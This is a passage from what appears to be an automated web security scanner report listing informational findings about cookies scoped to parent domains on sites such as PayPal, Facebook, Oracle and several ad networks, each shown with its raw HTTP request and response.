HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: eng=1_1315328782_20056:1658183; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 17:06:22 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2

12.17. https://cms.paypal.com/us/cgi-bin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://cms.paypal.com
Path:	/us/cgi-bin/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /us/cgi-bin/ HTTP/1.1
Host: cms.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.18. http://developers.facebook.com/plugins/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://developers.facebook.com
Path:	/plugins/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plugins/ HTTP/1.1
Host: developers.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Location: /docs/plugins
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-UA-Compatible: IE=edge
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fdevelopers.facebook.com%2Fplugins%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.195.105
Connection: close
Date: Tue, 06 Sep 2011 17:06:31 GMT
Content-Length: 0

12.19. http://education.oracle.com/cgi-bin/shopcart/viewcart.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/cgi-bin/shopcart/viewcart.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

shopCartId=6496530; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cgi-bin/shopcart/viewcart.cgi HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: shopCartId=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: source=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: org_id=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: lang=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: territoryCode=deleted; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: territoryCode=US; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Set-Cookie: lang=US; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Set-Cookie: org_id=1001; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Set-Cookie: shopCartId=6496530; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Set-Cookie: source=OU; expires=Tue, 13-Sep-2011 15:59:34 GMT; domain=.oracle.com ; path=/
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057819944031981,1)
Date: Tue, 06 Sep 2011 15:59:33 GMT
Content-Length: 5316

<html>
<head>
<title>Oracle University: Empty Shopping Cart</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<SCRIPT LANGUAGE="JavaScript">
var orgid = 1001;
var lan
...[SNIP]...

12.20. http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://education.oracle.com
Path:	/pls/web_prod-plq-dad/db_pages.getpage

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

p_mcc=WWOCOMINTMAINPAGEBNR; domain=.oracle.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pls/web_prod-plq-dad/db_pages.getpage?page_id=402&p_nl=ORSL&intcmp=WWOCOMINTMAINPAGEBNR HTTP/1.1
Host: education.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 6859
Content-Type: text/html; charset=UTF-8
Set-Cookie: p_mcc=WWOCOMINTMAINPAGEBNR; domain=.oracle.com; path=/
Set-Cookie: p_org_id=1001; domain=.oracle.com; path=/
Set-Cookie: p_lang=US; domain=.oracle.com; path=/
Set-Cookie: p_cur_URL=0; domain=.oracle.com; path=/
Connection: Close
Server: Oracle-Application-Server-10g/10.1.3.5.0 Oracle-HTTP-Server OracleAS-Web-Cache-10g/10.1.2.3.0 (N;ecid=72057867188663244,0)
Date: Tue, 06 Sep 2011 15:59:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

12.21. http://id.google.com/verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://id.google.com
Path:	/verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NID=50=SvhSQwwc_f05ytceKz3t_muBbRrFYuwb4q2aMa6_eczHxS7UwVoND78j00dvnenEHEPde95OEOC0FEEsn_DBzr_g2116E6t-KYynBReKkeRqJkxn8r7XlTtVkBWfyFJ5; expires=Wed, 07-Mar-2012 16:45:17 GMT; path=/; domain=.google.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /verify/EAAAAD-iXgu2vbxNdstW5Dqjp0A.gif HTTP/1.1
Host: id.google.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SNID=50=bVxkgLcqEicQGWCwjN0J7lK28lXRF1qOuXMwopVHzA=1szWgyw5SFrHzZqV; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=UM-W7hk_5lna5JT_N9txdKVGnIyNY4wopCXXYtopjBtld5ONhmSDu6GJQ_In3uzA9a8cuXTpiucWjK0yk2HpxwRWas0z4viIZjV0bJJqE8Rpvlnnv4TJfoQ9H48sFabX

Response

HTTP/1.1 200 OK
Set-Cookie: NID=50=SvhSQwwc_f05ytceKz3t_muBbRrFYuwb4q2aMa6_eczHxS7UwVoND78j00dvnenEHEPde95OEOC0FEEsn_DBzr_g2116E6t-KYynBReKkeRqJkxn8r7XlTtVkBWfyFJ5; expires=Wed, 07-Mar-2012 16:45:17 GMT; path=/; domain=.google.com; HttpOnly
Cache-Control: no-cache, private, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Content-Type: image/gif
Date: Tue, 06 Sep 2011 16:45:17 GMT
Server: zwbk
Content-Length: 43
X-XSS-Protection: 1; mode=block

GIF89a.............!.......,...........D..;

12.22. http://imp.fetchback.com/serve/fb/adtag.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/adtag.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /serve/fb/adtag.js?tid=11792&type=mrect HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1313670599_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:16 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 204

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=11792&type=mrect' width='300' height='250' marginheight='0' marginwidth='0' frameborder='0' scrolling='no'"+"><"+"/iframe"+">"
...[SNIP]...

12.23. http://imp.fetchback.com/serve/fb/imp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/serve/fb/imp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

cre=1_1315321216_20056:11790:1:1650753:1650753_20054:11791:1:1896427:1896427; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
kwd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
scg=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
ppd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
act=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/imp?tid=11792&type=mrect HTTP/1.1
Host: imp.fetchback.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
Cookie: __utma=92051597.1414720445.1313187587.1313187587.1313187587.1; __utmz=92051597.1313187587.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; cmp=1_1313187598_20:0; uid=1_1315321216_1313187598706:3996835167182453; kwd=1_1313670463; sit=1_1313187598_11:0:0; cre=1_1313670463_20056:11790:1:0:0_20054:11791:1:245674:245674; bpd=1_1313187598; apd=1_1313187598; scg=1_1313670463; ppd=1_1313670463; afl=1_1313187598; act=1_1313670463; eng=1_1313670599_20056:0

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: cre=1_1315321216_20056:11790:1:1650753:1650753_20054:11791:1:1896427:1896427; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: uid=1_1315321216_1313187598706:3996835167182453; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: kwd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: scg=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: ppd=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Set-Cookie: act=1_1315321216; Domain=.fetchback.com; Expires=Sun, 04-Sep-2016 15:00:16 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Tue, 06 Sep 2011 15:00:16 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 5114

<style type="text/css">body {margin: 0px; padding: 0px;}</style><style type="text/css">
/*
TODO customize this sample style
Syntax recommendation http://www.w3.org/TR/REC-CSS2/
*/

button.fb-fi
...[SNIP]...

12.24. https://login.cnbc.com/cas/logout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.cnbc.com
Path:	/cas/logout

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

CASLOGOUT=1315321471554; Domain=.cnbc.com; Expires=Tue, 06-Sep-2011 23:04:31 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cas/logout HTTP/1.1
Host: login.cnbc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.25. http://m1215.ic-live.com/522/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m1215.ic-live.com
Path:	/522/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:44 GMT; Path=/
pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:44 GMT; Path=/
sid1215=1315327545U3aHt51RXPi099; Domain=.ic-live.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /522/?33083100&OVMTC=Broad&site=&creative=6492920360&OVKEY=beauty%20products&url_id=33083100 HTTP/1.1
Host: m1215.ic-live.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ngx_userid=50.23.123.106:1315327539133; pid2=1315301244rR4cN0jX2yM1; sid1460=1315327539qIJ0arLZTDmI99; cvt586=106159628; ngx_106159628=2011-09-06:09:45:39

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:44 GMT; Path=/
Set-Cookie: pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:44 GMT; Path=/
Set-Cookie: sid1215=1315327545U3aHt51RXPi099; Domain=.ic-live.com; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT"
Location: http://www.marykay.com/?pid=mk
Date: Tue, 06 Sep 2011 16:45:44 GMT
Set-Cookie: Coyote-2-a210828=a210872:0; path=/
Content-Length: 0

12.26. http://m1460.ic-live.com/586/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m1460.ic-live.com
Path:	/586/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:40 GMT; Path=/
pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:40 GMT; Path=/
sid1460=1315327540EFWgV8Bzct0q99; Domain=.ic-live.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /586/?106159628&OVMTC=Phrase&site=&creative=9131745784&OVKEY=beauty%20product&url_id=106159628 HTTP/1.1
Host: m1460.ic-live.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pid2=1315301244rR4cN0jX2yM1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: ngx_userid=50.23.123.106:1315327539133; Domain=.ic-live.com; Expires=Thu, 05-Sep-2013 16:45:40 GMT; Path=/
Set-Cookie: pid2=1315301244rR4cN0jX2yM1; Domain=.ic-live.com; Expires=Wed, 05-Sep-2012 16:45:40 GMT; Path=/
Set-Cookie: sid1460=1315327540EFWgV8Bzct0q99; Domain=.ic-live.com; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT"
Location: http://www.cvs.com/CVSApp/promoContent/promoLandingTemplate.jsp?promoLandingId=1350&WT.mc_id=PS_ECBC_Google
Date: Tue, 06 Sep 2011 16:45:40 GMT
Set-Cookie: Coyote-2-a210828=a210874:0; path=/
Content-Length: 0

12.27. http://oasc12059.247realmedia.com/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc12059.247realmedia.com
Path:	/RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011R0ynx; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_jx.ads/cvs/searchpage/1560290950@Top1 HTTP/1.1
Host: oasc12059.247realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.cvs.com/CVSApp/search/search.jsp?searchTerm=shampoo+bandaid+xss&QP=N%3D92%26Ntk%3DAll%26Nty%3D1%26Ne%3D14%26Ntx%3Dmode+matchallpartial%26Nr%3DOR%7B92%2COR%7B93%7D%2COR%7B90%7D%2COR%7B122%7D%7D%26searchType%3DsearchHome&x=0&y=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=Mhd7ak5i4akACMfX; RMFD=011R02P3O1022jF2

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:47:21 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: RMFD=011R0ynx; expires=Sat, 01-Jan-2000 23:59:59 GMT; path=/; domain=.247realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 807
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5e45525d5f4f58455e445a4a423660;path=/;httponly

document.write ('<script language="JavaScript" type="text/javascript" src="https://view.atdmt.com/DEN/jview/328347987/direct/01/823358824?click=http://oasc12059.247realmedia.com/RealMedia/ads/click_lx
...[SNIP]...

12.28. http://optimized-by.rubiconproject.com/a/6451/11953/20435-15.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6451/11953/20435-15.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses15=9844^2&11953^4; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61374; path=/; domain=.rubiconproject.com
csi15=2553663.js^1^1315321025^1315321025&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:57:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6451/11953/20435-15.js?cb=0.7766812939662486&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses15=9844^2&11953^2; csi15=1295156.js^2^1315320939^1315320950&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Tue, 06-Sep-2011 15:57:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^4; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61374; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=2553663.js^1^1315321025^1315321025&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:57:05 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1735

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "2553663"
...[SNIP]...

12.29. http://optimized-by.rubiconproject.com/a/6451/11953/20435-2.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/6451/11953/20435-2.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:41 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=9844^2&11953^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61338; path=/; domain=.rubiconproject.com
csi2=1295153.js^2^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; expires=Tue, 13-Sep-2011 14:57:41 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/6451/11953/20435-2.js?cb=0.2368586107622832&keyword=%esid! HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ses2=9844^2; csi2=638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=6451/11953; ses15=9844^2&11953^5; csi15=2553663.js^2^1315321038^1315321048&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:41 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:57:41 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Tue, 06-Sep-2011 15:57:41 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=9844^2&11953^2; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61338; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=1295153.js^2^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; expires=Tue, 13-Sep-2011 14:57:41 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
